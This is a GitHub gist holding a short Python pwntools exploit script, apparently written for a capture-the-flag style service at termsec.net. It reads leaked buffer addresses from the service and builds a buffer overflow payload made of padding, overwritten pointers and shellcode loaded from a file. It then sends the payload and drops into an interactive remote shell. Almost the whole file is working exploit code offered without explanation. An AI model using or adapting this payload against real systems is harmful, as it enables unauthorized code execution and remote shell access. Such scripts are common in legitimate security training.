Create a gist now

Instantly share code, notes, and snippets.

@m--- /www.py Secret
Last active Aug 29, 2015

# coding: utf-8
import os
import sys
import time
import re
import struct
import pwn
host = 'www.termsec.net'
port = 17284
p = lambda x: struct.pack('<I', x)
s = pwn.remote(host, port)
result = s.recv()
matches = re.search('buffers at (0x[0-9a-f]+) and (0x[0-9a-f]+)', result)
ptr_str1 = int(matches.group(1), 16)
ptr_str2 = int(matches.group(2), 16)
pwn.log.info('str1: 0x%x, str2: 0x%x' % (ptr_str1, ptr_str2))
payload = ('A' * 45) + p(0x8049d08) + p(ptr_str1 + 45 + 8) + p(ptr_str1 + 45 + 12) + open('x86-linux-sh', 'rb').read()
payload += 'B' * (200 - len(payload))
payload2 = p(0xdeedbeef)
s.send(payload + "\n")
s.send(payload2 + "\n")
print s.recv()
s.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment